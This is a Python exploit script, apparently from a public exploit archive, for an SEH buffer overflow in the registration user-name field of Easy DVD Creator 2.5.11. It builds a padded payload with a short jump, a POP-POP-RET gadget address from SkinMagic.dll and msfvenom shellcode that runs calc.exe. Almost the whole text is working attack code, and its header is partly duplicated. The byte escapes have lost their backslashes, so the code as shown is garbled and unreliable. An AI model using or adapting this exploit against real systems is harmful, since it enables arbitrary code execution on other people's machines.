Easy DVD Creator 2.5.11 Buffer Overflow

#!/usr/bin/env python

# Exploit Title : Easy DVD Creator 2.5.11 - Buffer Overflow in 'Registration UserName Field' (SEH)
# Discovery by : Shubham Singh
# Known #!/usr/bin/env python

# Exploit Title : Easy DVD Creator 2.5.11 - Buffer Overflow in 'Registration UserName Field' (SEH)
# Discovery by : Shubham Singh
# Known As : Spirited Wolf [Twitter: @Pwsecspirit]
# Email : spiritedwolf@protonmail.com
# Youtube Channel : www.youtube.com/c/Pentestingwithspirit
# Discovey Date : 29/07/2018
# Software Link : http://www.divxtodvd.net/dvd-creator.htm
# Tested Version : 2.5.11
# Tested on OS : Windows XP Service Pack 3 x86
# Steps to Reproduce: Run the python exploit script, it will create a new file with the name "exploit.txt".
# Just copy the text inside "exploit.txt" and start the Easy DVD Creator 2.5.11 program and click on "Register".
# In the third field i.e "Enter User Name" paste the content of "exploit.txt" and click on "OK". You will see a sweet calculator poped up.
# Greetz : @FuzzySec @LiveOverflow @hexachordanu

buffer = "x41" * 996
#Short Jump address
nseh = "xebx06x90x90"
#0x10037859 : pop ebx # pop eax # ret | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False,
# v1.8.1.1 (C:Program FilesEasy DVD CreatorSkinMagic.dll)
seh= "x59x78x03x10"
#badchar x00x0ax0d
#msfvenom -p windows/exec CMD=calc.exe -b 'x00x0ax0d' -f python
buf = ""
buf += "xbfx4dxb3x6bx1exdaxdaxd9x74x24xf4x58x33"
buf += "xc9xb1x31x31x78x13x83xe8xfcx03x78x42x51"
buf += "x9exe2xb4x17x61x1bx44x78xebxfex75xb8x8f"
buf += "x8bx25x08xdbxdexc9xe3x89xcax5ax81x05xfc"
buf += "xebx2cx70x33xecx1dx40x52x6ex5cx95xb4x4f"
buf += "xafxe8xb5x88xd2x01xe7x41x98xb4x18xe6xd4"
buf += "x04x92xb4xf9x0cx47x0cxfbx3dxd6x07xa2x9d"
buf += "xd8xc4xdex97xc2x09xdax6ex78xf9x90x70xa8"
buf += "x30x58xdex95xfdxabx1exd1x39x54x55x2bx3a"
buf += "xe9x6exe8x41x35xfaxebxe1xbex5cxd0x10x12"
buf += "x3ax93x1exdfx48xfbx02xdex9dx77x3ex6bx20"
buf += "x58xb7x2fx07x7cx9cxf4x26x25x78x5ax56x35"
buf += "x23x03xf2x3dxc9x50x8fx1fx87xa7x1dx1axe5"
buf += "xa8x1dx25x59xc1x2cxaex36x96xb0x65x73x68"
buf += "xfbx24xd5xe1xa2xbcx64x6cx55x6bxaax89xd6"
buf += "x9ex52x6exc6xeax57x2ax40x06x25x23x25x28"
buf += "x9ax44x6cx4bx7dxd7xecxa2x18x5fx96xba"

nops = "x90" * 16

exploit = buffer + nseh + seh + nops + buf + "C" * (1000 - len(buffer) - 8 - len(nops) - len(buf))
f = open ("exploit.txt", "w")
f.write(exploit)
f.close()